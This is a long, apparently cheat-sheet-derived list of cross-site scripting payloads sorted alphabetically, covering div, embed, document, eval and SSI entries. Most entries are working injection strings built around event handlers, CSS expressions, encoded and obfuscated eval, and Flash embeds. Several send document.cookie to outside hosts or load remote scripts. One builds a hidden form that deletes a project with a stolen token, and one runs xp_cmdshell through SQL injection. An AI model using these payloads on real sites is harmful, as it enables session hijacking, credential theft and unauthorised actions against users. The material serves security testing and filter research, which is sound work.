- <div id=”div1"><input value=”``onmouseover=alert(1)”></div> <div id=”div2"></div><script>document.getElementById(“div2”).innerHTML = document.getElementById(“div1”).innerHTML;</script>
- <div id=”div1"><input value=”``onmouseover=javascript:alert(1)”></div> <div id=”div2"></div>
- <div id=”div1"><input value=”``onmouseover=javascript:alert(1)”></div> <div id=”div2"></div><script>document.getElementById(“div2”).innerHTML = document.getElementById(“div1”).innerHTML;</script>
- <div id=d><x xmlns=”><body onload=alert(1)”><script>d.innerHTML=����</script>
- <div id=d><x xmlns=”><iframe onload=alert(1)”></div>
- <div id=d><x xmlns=’”><iframe onload=alert(2)//’></div>
- <div id=d><x xmlns=”><iframe onload=javascript:alert(1)”></div> <script>d.innerHTML=d.innerHTML</script>
- <div id=”myxsxxcd” style=”color:red;display:none” title=”if(!window.myxsssxx){window.myxsssxx=123;alert(document.cookie);}”>
- <div id = “x”></div><script>alert(x.parentNode.parentNode.parentNode.location)</script>
- <div id=”xss” onwebkittransitionend=”alert(1)” style=”-webkit-transition: width .1s;”></div>
- <DIV id=XSS STYLE=”background-image: url(javascript:alert(‘XSS’))”>
- <DIV id=XSS STYLE=”binding: url(javascript:alert(‘XSS’));”>
- <div id=”xss” style=”float:left” onfocus=”alert(1)”>
- <div id=”xss” style=”-ms-block-progression:bt” onfocus=”alert(1)”>
- <div id=”xss” style=”-ms-layout-flow:vertical-ideographic” onfocus=”alert(1)”>
- <DIV id=XSS STYLE=”width: expression(alert(‘XSS’));”>
- <div id=”x”>x</div> <xml:namespace prefix=”t”> <import namespace=”t” implementation=”#default#time2"> <t:set attributeName=”innerHTML” targetElement=”x” to=”<imgsrc=x:xonerror=javascript:alert(1)>”>
- <div id=”x”>x</div> <xml:namespace prefix=”t”> <import namespace=”t” implementation=”#default#time2"> <t:set attributeName=”innerHTML” targetElement=”x” to=”<img src=x:x onerror =javascript:alert(1)>”>
- <div id=”x”>XXX</div> <style> #x{font-family:foo[bar;color:green;} #y];color:red;{} </style>
- <div id=”x”>XXX</div> <style> #x{font-family:foo[bar;color:green;} #y];color:red;{} </style>
- <div>jaVasCript:/*-/*`/*\`/*’/*”/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/ — !>\x3csVg/<sVg/oNloAd=alert()//>\x3e</div>
- ‘“>><div><meter onmouseover=”alert(1)”</div>”
- <div    style=\-\mo\z\-b\i\nd\in\g:\url(//business\i\nfo.co.uk\/labs\/xbl\/xbl\.xml\#xss)>
- div ng-app ng-cspng-focus=”x=$event.view.window;x.”
- <div onactivate=”alert(1)” id=”xss” style=”overflow:scroll”></div>
- <div onactivate=alert(‘Xss’) id=xss style=overflow:scroll>
- <div onbeforescriptexecute=”alert(1)”></div>
- <div onclick=”alert(‘xss’)”>
- <div onfocus=”alert(1)” contenteditable tabindex=”0" id=”xss”></div>
- <div onfocus=”alert(1)” id=”xss” style=”display:table”>
- <div onfocus=alert(‘xx’) id=xss style=display:table>
- <div onmouseenter=”alert(‘xss’)”>
- <div onmousemove=”alert(200)” src=”xxxx”>
- <div/onmouseover=’alert(1)’>renwa
- <div/onmouseover=’alert(1)’> style=”x:”>
- <div/onmouseover=’alert(1)’> style=”x:”>
- <div/onmouseover=’alert(1)’>X
- <div onmouseover=’alert(1)’>DIV</div>
- <div onmouseover=”alert(‘XSS’);”>,
- <div/onmouseover=’confirm(1)’> style=”x:”>
- <div onmouseover=’confirm(1)’>DIV</div>
- <div onmouseover=”document.vulnerable=true;”>
- <div onmouseover=prompt(“1”)>renwa
- div ref=mes.bind=”$this.me.ownerdefaultView.” /div
- <div><script>alert(1)
- →</div><script src=/test.js></script>
- <div>”src=data:,alert%281%29></script><script x=”</div>
- <div>”src=data:,alert%2824%29></script><script x=”</div>
- <div style=”width:expression(alert('1'))”>1</div>
- <div style=”width:\0065xpression(alert(/1/))”>1</div>
- <div style=”\63	\06f
\0006c\00006F
\R:\000072 Ed;color\0\bla:yellow\0\bla;col\0\00 \ or:blue;”>XXX</div><div style=”[a]color[b]:[c]red”>XXX</div>
- <div/style=\-\mo\z\-b\i\nd\in\g:\url(//business\i\nfo.co.uk\/labs\/xbl\/xbl\.xml\#xss)&>
- <div style=”animation-name:x” onanimationstart=”alert(1)”></div>
- <DIV STYLE=”background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.
- <;DIV STYLE=”;background-image:\0075\0072\006C\0028';\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.10530053\0027\0029';\0029";>;
- <DIV STYLE=”background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029">
- <DIV STYLE=”background-image: 075 072 06C 028 06a 061 076 061 073 063 072 069 070 074 03a 061 06c 065 072 074 028.1027 058.1053 053 027 029 029">
- <;DIV STYLE=”;background-image: url(&;#1;javascript:alert(‘;XSS’;))”;>;
- <DIV ?STYLE=”background-image: ?url(javascript:alert(‘XS ?S’))”>
- <DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>
- <DIV STYLE=”background-image: url(javascript:confirm(5))”>
- <div STYLE=”background-image: url(javascript:document.vulnerable=true;)”>
- <div style=”background-image:url(javascript:alert(‘1’))”>
- <DIV+STYLE=”background-image: url(javascript:alert(1))”>
- <div style=”background-image:url(javascript:alert(document.cookie))”>
- <DIV STYLE=”background-image: url(javascript:alert(‘X1SS’))”>
- <;DIV STYLE=”;background-image: url(javascript:alert(‘;XSS’;))”;>;
- <DIV STYLE=”background-image: url( javascript:alert(‘XSS’))”>
- <DIV STYLE=”background-image: url(javascript:alert(‘XSS’));”>
- <DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>
- <DIV STYLE=”background-image: url(javascript:alert(XSS))”>
- <DIV STYLE=”background-image: url(javascript:confirm(5))”>
- <div style=”background-image: url(javascript:document.vulnerable=true;);”>
- <div STYLE=”background-image: url(javascript:document.vulnerable=true;)”>
- <DIV STYLE=”background-image: url(javascript:javascript:alert(1))”>
- <div style=”background-image:url(<script>alert(document.cookie)</script>)”>
- <div style=”background:url(/f#oo/;color:red/*/foo.jpg);”>X
- <div style=”background:url(/f#[a]oo/;color:red/*/foo.jpg);”>X</div>
- <div style=”background:url(/f#oo/;color:red/*/foo.jpg);”>X
- <div style=”background:url(/foo/;color:red/*/foo.jpg);”>X
- <div style=”background:url(http://foo.f/f oo/;color:red/*/foo.jpg);”>X</div>
- <div style=behavior:url(“ onclick=alert(1)//”>XSS’OR
- <div style=”behaviour:url(‘http://www.how-to-hack.org/exploit.html');">
- <DIV STYLE=”behaviour: url(‘http://www.how-to-hack.org/exploit.html');">
- <DIV STYLE=”behaviour: url(‘http://xss.ha.ckers.org/exploit.htc');">
- <div style=”behaviour: url([link to code]);”>
- <div style=”binding: url(http://www.securitycompass.com/xss.js);"> [Mozilla]
- <div style=”binding: url([link to code]);”>
- <div style=”color: ‘<’; color: expression(alert(‘XSS’))”>
- <div style=”color: expression(alert(‘XSS’))”>
- <div style=”color:rgb(''x:expression(alert(1))”></div>
- <div style=”color:rgb(‘’�x:expression(alert(1))”></div>
- <Div style = “color: rgb (‘’ & # 0; x: expression (alert (1))”> </ div>
- <div style=”color:rgb(‘’�x:expression(alert(URL=1))”></div>
- <div style=”color:rgb(‘’�x:expression(confirm(URL=1))”></div>
- <div style=content:url(data:image/svg+xml,%3Csvg/%3E);visibility:hidden onload=alert(1)></div>
- <div/style=content:url(data:image/svg+xml);visibility:visible onmouseover=confirm(1)>Mouse Over</div>
- <div style=content:url(%(svg)s)></div>
- <div style=”display:none”></div><div style=”display:none” t=”1" e=”style\/<'"></div>"/ \""/<img src=# onerror=eval(String.fromCharCode(60,115,99,114,105,112,116,32,115,114,99,61,47,47,120,115,115,46,116,119,47,51,48,53,56,62,60,47,115,99,114,105,112,116,62,32));/\>>
- <div style=”display:none” style=”behavior:url(‘?1’)”
- <div style=”display:none” style=”behavior:url(‘?1’)” onreadystatechange=”alert(1)”>1</div>
- <div style=”font-family:’foo ;color:red;’;”>LOL
- <div style=”font-family:’foo ;color:red;’;”>XXX
- <div style=”font-family:’foo[a];color:red;’;”>XXX</div>
- <div style=”font-family:foo{bar;background:url(http://foo.f/oo};color:red/*/foo.jpg);">X
- <div style=”font-family:foo{bar;background:url(http://foo.f/oo};color:red/*/foo.jpg);">X</div>
- <div style=”font-family:’foo ;color:red;’;”>XXX
- <div style=”font-family:foo}color=red;”>XXX
- <div style=”font-family:foo}color=red;”>XXX</div>
- <div style = “list-style-image:url(javascript:alert(xSS))”>
- <div style=”list-style:url(http://foo.f)\20url(javascript:alert(1));">X</div>
- <div style=”list-style:url(http://foo.f)\20url(javascript:javascript:alert(1));">X
- <div/style=\-\mo\z\-b\i\nd\in\g:\url(//business\i\nfo.co.uk\/labs\/xbl\/xbl\.xml\#xss)>
- <div style=”-moz-binding:url(http://xssor.io/0.xml#xss);x:expression((window.r!=1)?eval('x=String.fromCharCode;scr=document.createElement(x(115,99,114,105,112,116));scr.setAttribute(x(115,114,99),x(104,116,116,112,58,47,47,119,119,119,46,48,120,51,55,46,99,111,109,47,48,46,106,115));document.getElementById(x(105,110,106,101,99,116)).appendChild(scr);window.r=1;'):1);"id="inject">
- <div style=”-ms-scrolllimit:1px;overflow:scroll;width:1px”
- <div style=”-ms-scroll-limit:1px;overflow:scroll;width:1px” onscroll=”alert(1)”>
- <div style=”-ms-scroll- limit:1px;overflow:scroll;width:1px” onscroll=alert(‘xss’)>
- <div style=”-ms-scroll-limit:1px;overflow:scroll;width:1px” onscroll=alert(‘xss’)>
- <DIV STYLE_NeatHtmlReplace=”background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029">
- <DIV STYLE_NeatHtmlReplace=”background-image: url(javascript:alert(‘XSS’))”>
- <DIV STYLE_NeatHtmlReplace=”background-image: url(javascript:alert(‘XSS’))”>
- <DIV STYLE_NeatHtmlReplace=”width: expression(alert(‘XSS’));”>
- <div style=overflow:-webkit-marquee onscroll=alert(1)>
- <div style=”overflow:-webkit-marquee” onscroll=”alert(1)”></div>
- <div style=”position:absolute;top:0;left:0;width:100%;height:100%” onclick=”alert(52)”>
- <div style=”position:absolute;top:0;left:0;width:100%;height:100%” onmouseover=”prompt(1)” onclick=”alert(1)”>x</button>?
- <div style=”position:absolute;top:0;left:0;width:100%;height:100%” onmouseover=”prompt(1)” onclick=”alert(1)”>x</button>
- <div style=”position:absolute;top:0;left:0;width:100%;height:100%” onmouseover=”prompt(1)” onclick=”alert(1)”>x</button>?
- <div style=”position:absolute;top:0;left:0;width:100%;height:100%” onmouseover=”prompt(1)” onclick=”alert(1)”>x</button>
- <div style=”position:absolute;top:0;left:0;width:100%;height:100%” onmouseover=”prompt(1)” onclick=”alert(1)”>x</button><div style=”position:absolute;top:0;left:0;width:100%;height:100%” onmouseover=”prompt(1)” onclick=”confirm(1)”>x</button>
- <div style=”position:absolute;top:0;left:0;width:100%;height:100%” onmouseover=”prompt(1)” onclick=”confirm(1)”>x</button>?f
- <div style=”visibility:hidden” style=”behavior:url(‘?2’)”
- <div style=”visibility:hidden” style=”behavior:url(‘?2’)” onreadystatechange=”alert(2)”>2</div>
- <div style=”-webkit-user-modify:read-write” onfocus=”alert(1)” id=”xss”>
- <div style=”-webkit-user-modify:read-write-plaintext-only” onfocus=”alert(1)” id=”xss”>
- <div style=”width:\0065xpressio\6e(alert(/1/))”>1</div>
- <div style=”width:\0065xpression(alert(/1/))”>1</div>
- <div style=width:1px;filter:glow onfilterchange=alert(1)>x
- <div style=width:1px;filter:glow onfilterchange=alert(1)>x</div>
- <div style=width:1px;filter:glow onfilterchange=javascript:alert(1)>x
- <div style=”width:exp/**
- <div style=”width:expression(alert(‘1’));”>
- <div style=”width:exp/****/ression(alert(/1/))”>1</div>
- <div style=”width:expression(alert(/1/))”>1</div>
- <div style=”width:expression(alert(‘1’))”>1</div>
- <DIV STYLE=”width:expression(alert(‘anyunix’));”>
- <div style=”width:expression(alert(‘x123ss’));”>
- <DIV STYLE=”width: expression(alert(‘X2SS’));”>
- <;DIV STYLE=”;width: expression(alert(‘;XSS’;));”;>;
- <DIV STYLE=”width: ?expression(alert(‘XSS’));”>
- <DIV STYLE=”width: expression(alert(‘XSS’));”>
- <DIV STYLE=”width: expression(alert(XSS));”>
- <div style=”width:expression(confirm(1))”>X</div>
- <div/style=”width:expression(confirm(1))”>X</div>
- <div/style=”width:expression(confirm(1))”>X</div> {IE7}
- <DIV STYLE=”width: expression(confirm(5));”>
- <div style=”width: expression(document.vulnerable=true;);”>
- <div STYLE=”width: expression(document.vulnerable=true);”>
- <DIV STYLE=”width:expression(javascript:alert(1));”>
- <DIV STYLE=”width: expression_r(alert(‘XSS’));”>
- <div style=”x:\000065\000078\000070\000072\000065\000073\000073\000069\00006f\00006e(alert(1))”>Joker</div>
- <div style=”x:\65\78\70\72\65\73\73\69\6f\6e\028 alert \028 1 \029 \029">Joker</div>
- <div style=”x:\65\78\70\72\65\73\73\69\6f\6e(alert(1))”>Joker</div>
- <div style=’x:anytext/**/xxxx/**/n(alert(1)) (“\”))))))expressio\”)’>aa</div>
- <div style=’x:anytext/**/xxxx/**/n(confirm(1)) (“\”))))))expressio\”)’>aa</div> //
- <div style=”x:expression(alert(1))”>Joker</div>
- <div style=”x:expression((window.r==1)?’’:eval(‘r=1;
- <div style=”x:expression((window.r==1)?’’:eval(‘r=1;
- <div style=”xg-p:absolute;top:0;left:0;width:100%;height:100%” onmouseover=”prompt(1)” onclick=”alert(1)”>x</button>
- <div/style==”x onclick=alert(1)//”>XSS’OR
- <div style=xss:expres\sion(if(!window.x){alert(‘xss’);window.x=1;})></div>
- <div style=x:x(“ onclick=alert(1)//”>XSS’OR
- <div style=”z:exp/*anything*/res/*here*/sion(alert(1))” />
- /div /template
- <div title=”%></script>"<img src=1 onerror=confirm(1)>”></div>
- div type=underscore/template % % /div
- <div=’x="'><iframe/onload=alert(1)>’>
- dnd →<script>alert(9)</script><! — %20
- doc.documentElement.innerHTML+=’’;
- doc=document.implementation.createHTMLDocument(‘&lt;/title&gt;&lt;img src=1 onerror=alert(1)&gt;’);
- doc = new ActiveXObject(“htmlFile”);
- <!doctype”:
- <!DOCTYPE x[<!ENTITY x SYSTEM “http://html5sec.org/test.xxe">]><y>&x;</y>
- “;document.body.addEventListener(“DOMActivate”,alert(1))//
- “;document.body.addEventListener(“DOMActivate”,confirm(1))//
- “;document.body.addEventListener(“DOMActivate”,prompt(1))//
- document.body.appendChild(f);
- document.body.appendChild(fo);
- document.body.appendChild(fr);
- document.body.innerHTML=(‘<\000\0i\000mg src=xx:x onerror=alert(1)>’)
- document.body.innerHTML=(‘<\000\0i\000mg src=xx:x onerror=confirm(1)>’)
- document.body.innerHTML=’”onerror=”alert(1)”>’.anchor(‘“><img src=’);
- document.body.setAttribute(‘onclick’,’go();’);
- “+document.cookie+”
- document.cookie=’xss=xss;domain=.cx.’
- ‘() {‘document.createElement(‘img’).src=’javascript:while(1){}’
- [document.domain].find(alert)>
- document.domain=’qq.com’
- document.getElementById(‘form_xss’).submit();
- document.getElementById(“iframe1”).contentDocument.getElementsByName(“owner”)[0].getElementsByTagName(“a”)[0].href;
- document.getElementById(“iframe2”).contentDocument.forms[1].token.value;
- document.getElementById(“iframe”).contentDocument.getElementById(“projects-dropdown”);
- document.getElementById(“test”).innerHTML =” \u003cimg src=1 onerror=alert(/xss/)\u003e”;
- document.getElementById(‘text’).innerHTML = ‘Click Here Again!’;
- document.getElementById(‘text’).setAttribute(‘style’,’color:red;’);
- document.getElementById(‘xss_content’).value = content;
- document.getElementsByName(“login”).item(0).src = http://xss.cx/
- document.getElementsByTagName(‘body’)[0].appendChild(form);
- document.getElementsByTagName(‘body’)[0].appendChild(frame);
- document.location=”http://xss.cx/default.aspx?c=" + document.cookie
- document.location=unescape(“%19Jav%09asc%09ript:https ://foobar/%250Aconfirm%25281%2529”)
- ‘},document.location=window.name+’//’+
- document.location=window.name+’//’+
- document.location=window.name%2b%27//%27%2b
- $_=document,$__=$_.URL,$___=unescape,$_=$_.body,$_.innerHTML = $___(http=$__)
- $=document,$=$.URL,$$=unescape,$$$=eval,$$$($$($))
- \”;document.vulnerable=true;;//
- &{document.vulnerable=true;};
- document.write(a);
- document.write(doc.documentElement.innerHTML)
- document.write(‘<form><input id=p type=password></form>’);setTimeout(“alert(document.getElementById(‘p’).value)”, 50)
- “;document.write(‘<img sr’%2b’c=http://p42.us/x.png?'%2bdocument['cookie']%2b'>');"
- “;document.write(‘<img src=http://p42.us/x.png?'%2bdocument.cookie%2b'>');"
- document.write(‘<img src=”<iframe/onload=confirm(1)>\0">’)
- document.writeln(‘<form width=”0" height=”0" method=”POST” action=”’+x+’adminAdvanced.do”>’); document.writeln(‘<input type=”hidden” name=”token” value=”’ + token + ‘“ />’); document.writeln(‘<input type=”hidden” name=”deletebtn” value=”Delete+project” />’); document.writeln(‘</form>’); document.forms[0].submit();
- document.write(‘<? oncl?ck=alert(1)>asd</?>’.toUpperCase()
- document.write(“<s”,”crip”,”t>al”,”ert(“,”1)”,”</s”,”cript>”)
- document.write(“<scr”+”ipt language=javascript src=http://localhost/></scr"+"ipt>");
- document.write(`<script>//# sourceMappingURL=https://pkav/?${escape(document.cookie)}</script>`)
- ‘document.write(String.fromCharCode(60,115,99,114,105,112,116,32,115,114,99,61,39,104,116,116,112,115,58,47,47,119,119,119,46,110,48,48,112,121,46,105,111,47,101,118,105,108,46,106,115,39,62,60,47,115,99,114,105,112,116,62))’
- document.write(String.fromCharCode(60,115,99,114,105,112,116,32,115,114,99,61,39,104,116,116,112,115,58,47,47,119,119,119,46,110,48,48,112,121,46,105,111,47,101,118,105,108,46,106,115,39,62,60,47,115,99,114,105,112,116,62))
- document.write(String.fromCharCode(60,12,62)); ==== document.write(String.fromCharCode(<script src=http://xss.me/1></script>;));
- ‘document.write(String.fromCharCode(‘+”,”.join([str(ord(n)) for n in payload])+’))’
- document.write(String.fromCharCode(‘+”,”.join([str(ord(n)) for n in payload])+’))
- →<d/ /ondrag=co\u006efir\u006d(2)>hello.
- (double reflection, single input $p)
- d=x.getImageData(t*3,Y=t*120%82,2,D=3).data
- dXJjZSk=
- $$=’e’
- %E0%80%BCimg%20src%3D%E0%80%A21%E0%80%A2%20onerror%3D%E0%80%A2alert(1)%E0%80%A2%E0%80%BE
- E0%80%BCimg%20src%3D%E0%80%A21%E0%80%A2%20onerror%3D%E0%80%A2alert(1)%E0%80%A2%E0%80%BE
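- K (U+212A KELVIN SIGN, %E2%84%AA).toLowerCase() => k (so any keyword filter has to run after case-folding/normalisation, not before)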
- %E2%88%80%E3%B8%80%E3%B0%80script%E3%B8%80confirm(1)%E3%B0%80/script%E3%B8%80
- % E2% 88% 80% E3% B8% 80% E3% B0% 80script% E3% B8% 80confirm% 281% 29% E3% B0 % 80 80/script% E3% B8%
- (E=[A=[],g=!A+A][g[E=-~-~++A]+({}+A) [C=!!A
- (E=[A=[],g=!A+A][g[E=-~-~++A]+({}+A) [C=!!A+g,a=C[A]+C[+!A],A]+a])() [g[A]+g[A+A]+C[E]+a](A)
- e; alert(document.cookie); var foo=i
- eat backslash: %bb”alert(1) (GBK charset; defence: declare the page charset explicitly and escape output in a charset-aware way)
- echo $_GET[“p”];
- echo(‘IPT>alert(“XSS”)</SCRIPT>’); ?>
- echo(‘IPT>alert(\”XSS\”)</SCRIPT>’); ?>
- <;? echo(‘;<;SCR)’;;
- <? echo(‘<SCR)’;
- <? echo(‘<scr)’; echo(‘ipt>alert(“XSS”)</script>’); ?>
- <? echo(‘<scr)’; echo(‘ipt>alert(\”XSS\”)</script>’); ?>
- <? echo(‘<SCR)’;echo(‘IPT>alert(“XSS”)</SCRIPT>’); ?>
- <? echo(‘<SCR)’;echo(‘IPT>document.vulnerable=true</SCRIPT>’); ?>
- echo “<script>alert()</script>”
- echo “<script>alert()</script>” >> /tmp/bin.bin
- echo str_ireplace(“<script”, “”, $_GET[“q”]);
- echo str_ireplace(“<script”,”InvalidTag”, $_GET[“r”]);
- echo str_ireplace(“<script”,”<InvalidTag”, $_GET[“s”]);
- echo str_replace(“ “, “”, $_GET[“q”]);
- #eD1uZXcgWE1MSHR0cFJlcXVlc3QoKQ0KcD0nL3dwLWFkbWluL3Bsd
- e = document.createElement(‘input’);
- e.id = ‘xss_content’;
- ??�E��img src=a onerror=javascript:alert(‘test’)>�K?��
- E”><img src=”x:x” onerror=”alert(0)”>
- element[attribute=’<img src=x onerror=alert(‘XSS’);>
- <embed%20allowscriptaccess=always+src=https:html5sec.org/test.swf
- <embed allowscriptaccess=”alwalwaysays” src=”test.swf”>
- <embed allowscriptaccess=always src=/xss.swf><base href=”//l0.cm/
- <embed code=evil.swf allowscriptaccess=always>
- <embed/code=//goo.gl/nlX0P?
- <embed code=”http://businessinfo.co.uk/labs/xss/xss.swf" allowscriptaccess=always>
- <embed code=”http://businessinfo.co.uk/labs/xss/xss.swf"allowscriptaccess=always>
- <embed code=”http://businessinfo.co.uk/labs/xss/xss.swf" allowscriptaccess=always>?
- <embed code=”http://businessinfo.co.uk/labs/xss/xss.swf" allowscriptaccess=always>
- <Embed code = “http://businessinfo.co.uk/labs/xss/xss.swf" allowscriptaccess = always>
- <embed code=”http://xss.cx/xss.swf" allowscriptaccess=always></embed>
- <embed code=javascript:javascript:alert(1);></embed>
- <embed code=%(scriptlet)s></embed>
- <embed name=a flashvars=’autoplay=true&file=”})\”)-(alert=alert(1)))}catch(e){}//’ allowscriptaccess=always src=//vulnerabledoma.in/bypass/wp-includes/js/mediaelement/flashmediaelement.swf>
- <embed name=’alert(1)-’ allowscriptaccess=always src=//vulnerabledoma.in/bypass/wp-includes/js/mediaelement/flashmediaelement.swf>
- <embed onfocus=’popup=1;’><img
- <embed/:script allowscriptaccess=always src=//l0.cm/xss.swf>
- <embed src=/aaa>
- <embed src=”data:image/svg+xml;>
- <EMBED SRC=”data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==” type=”image/svg+xml” AllowScriptAccess=”always”></EMBED>
- <embed src=”data:text/html;base64,%(base64)s”>
- <embed src=”data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==”>
- <embed src=”data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==”></embed>
- <embed src=data:textml;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg>
- <embed src=evil.swf allowscriptaccess=always>
- <embed/src=//goo.gl/nlX0P>
- <embed/src=��//goo.gl/nlX0P��>
- <Embed / src = // goo.gl/nlX0P>
- <EMBED SRC=”http://3w.org/XSS/xss.swf" ></EMBED>
- <embed src=”http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf"> ?
- <embed src=”http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf">
- <EMBED SRC=”http://hacker.com/xss.swf" AllowScriptAccess=”always”>
- <;EMBED SRC=”;http://ha.ckers.org/xss.swf"; AllowScriptAccess=”;always”;>;<;/EMBED>;
- <EMBED SRC=”http://ha.ckers.org/xss.swf" AllowScriptAccess=”always”></EMBED>
- <EMBED SRC=”http://ha.ckers.org/xss.swf"AllowScriptAccess="always"></EMBED>
- <EMBED SRC=”http://ha.ckers.org/xss.swf" AllowScriptAccess=”always”></EMBED> (Using an EMBED tag you can embed a Flash movie that contains XSS. Adding the attributes allowScriptAccess=”never” and allownetworking=”internal” can mitigate this risk; thank you to Jonathan Vanasco for the info.)
- EMBED SRC=”http://ha.ckers.org/xss.swf" AllowScriptAccess=”always”></EMBED> (Using an EMBED tag you can embed a Flash movie that contains XSS. Adding the attributes allowScriptAccess=”never” and allownetworking=”internal” can mitigate this risk; thank you to Jonathan Vanasco for the info.)
- <embed src=https://evil/>
- <embed src=”javascript:alert(1)”>
- <embed src=javascript:alert(1)> *
- <embed src=javascript:alert(1)>
- <embed src=javascript:alert(1)>
- <embed src=javascript:alert(162)>
- <embed src=”javascript:alert(1)”></embed>
- <embed src=”javascript:alert(1)”></embed> // Firefox only
- <embed src=”javascript:alert(1)”></embed> // O10.10, OM10.0, GC6, FF
- <embed src=%(jscript)s></embed>
- ?embed src=”lol.swf” width=”1337" height=”1337" FlashVars=”param=something¶m2=somethingelse¶m3=lol”?
- <embed src=?p=%253Csvg/o%256Eload%253Dalert(1)%253E>
- <embed src=URL onload=alert(‘xss’)>
- <embed src=/x//alert(1)><base href=”javascript:\
- <embed type=”image” src=%(scriptlet)s></embed>
- <embed width=500 height=500 code=”data:text/html,<script>%(payload)s</script>”>
- <embed width=500 height=500 code=”data:text/html,<script>%(payload)s</script>”></embed>
- Ember.run(null, alert, 9)
- e.name = ‘c’;
- encodeURIComponent(''-alert(1)-'')
- encodeURIComponent(''-prompt(1)-'')
- encodeURIComponent('userinput')
- encodeURIComponent (‘userinput’)
- <![endif] →
- “;escape=eval;//
- e.type = ‘hidden’;
- eval(0+location.string) //or 1+location.string
- eval(0x258da033.toString(30))(1)
- eval(“1+1?>”);eval(“1+1</script>”);eval(“1+1//?>”);
- eval(1558153217..toString(36))(1)
- eval((1558153217).toString(36).concat(String.fromCharCode(40)).concat(1).concat(String.fromCharCode(41)))
- eval(630038579..toString(30))(1)
- eval(a+b+c+d);
- eval(“ale” + (!![]+[])[+!+[]]+(!![]+[])[+[]])(1)
- eval(‘ale’+’rt(0)’);
- eval(`${`${`${`${`${`a`}`}`}`}`}${`${`${`${`${`l`}`}`}`}`}${`${`${`${`${`e`}`}`}`}`}${`${`${`${`${`r`}`}`}`}`}${`${`${`${`${`t`}`}`}`}`}${`${`${`${`${`(1)`}`}`}`}`}`)
- eval(`ale${[[[[]=[]]=[[]=[]]]=[[]=[]]]=[]}rt(1)`);
- eval(atob(‘amF2YXNjcmlwdDphbGVydCgxKQ’));
- eval.call(this,unescape.call(this,location))
- eval(Dec(‘203041263543203’,’2549'));
- eval(document.referrer.slice(10));
- eval(JSON.stringify({a:1},null,’alert(1)//’))
- eval(location.hash.slice(1));
- eval(location.hash.slice(1))//
- eval(location.hash.slice(1))
- eval(location.hash.slice(1)>#alert(1)
- “);eval(name+”
- “+eval(name)+”
- eval(name)
- eval+name
- eval(String.fromCharCode(100,111,99,117,109,101,110,116,46,98,111,100,121,46,97,112,112,101,110,100,67,104,105,108,100,40,99,114,101,97,116,101,69,108,101,109,101,110,116,40,34,115,99,114,105,112,116,34,41,41,46,115,114,99,61,34,104,116,116,112,58,47,47,120,115,115,56,46,110,101,116,47,63,99,61,81,105,104,97,76,34))
- eval(String.raw({[`raw`]:`aet(1)`},…`lr`))
- eval(String.raw({raw:’aet(1)’},’l’,’r’))
- eval(Symbol(‘)-alert(1’).toString())
- eval(‘this.a;alert(1);//=”bbb”;’)
- eval(‘this.a=”bbb”;alert(1);//”’)
- $eval((toString()).constructor.fromCharCode(120,61,97,108,101,114,116,40,49,41)) }}
- eval(‘\\u’+’0061'+’lert(1)’)
- _=eval,__=unescape,___=document.URL,_(__(___))
- “;eval(unescape(location))//# %0Aalert(0)
- “;eval(unescape(location))//#%0Aprompt(0)
- %”;eval(unescape(location))//#%0Aprompt(0)
- eval(URL.slice(-8))>#alert(1)
- eval(“\x61\x6c\x65\x72\x74\x28\x31\x29a?)
- Event.prototype[0]=’@garethheyes’,Event.prototype.length=1;Event.prototype.toString=[].join;onload=alert
- Event.prototype[0]=’@garethheyes’,Event.prototype.length=1;Event.prototype.toString=[].join;onload=confirm
- Event.prototype.toString=[].join;Event.prototype.length=1;Event.prototype[0]=1;onhashchange=alert;onmessage=alert;
- <event-source src=”%(event)s” onload=”javascript:alert(1)”>
- evil=/ev/.source+/al/.source,changeProto=/Strin/.source+/g.prototyp/.source+/e.ss=/.source+/Strin/.source+/g.prototyp/.source+/e.substrin/.source+/g/.source,hshCod=/documen/.source+/t.locatio/.source+/n.has/.source+/h/.source;7[evil](changeProto);hsh=7[evil](hshCod),cod=hsh.ss(1);7 evil](cod)
- ‘;exec%20master..xp_cmdshell%20’dir%20 c:%20>%20c:\inetpub\wwwroot\?.txt’ — &&
- <! — #exec cmd=”/bin/echo ‘<SCR’” →<! — #exec cmd=”/bin/echo ‘IPT SRC=http://ha.ckers.org/xss.js></SCRIPT>'"-->
- <! — #exec cmd=”/bin/echo ‘<SCR’” →<! — #exec cmd=”/bin/echo ‘IPT SRC=http://www.securitycompass.com/xss.js></SCRIPT>'"-->
- <! — #exec cmd=”/bin/echo ‘<SCRIPT
- <;! — #exec cmd=”;/bin/echo ‘;<;SCRIPT SRC’;”; →;<;! — #exec cmd=”;/bin/echo ‘;=http://ha.ckers.org/xss.js>;<;/SCRIPT>;';";-->;
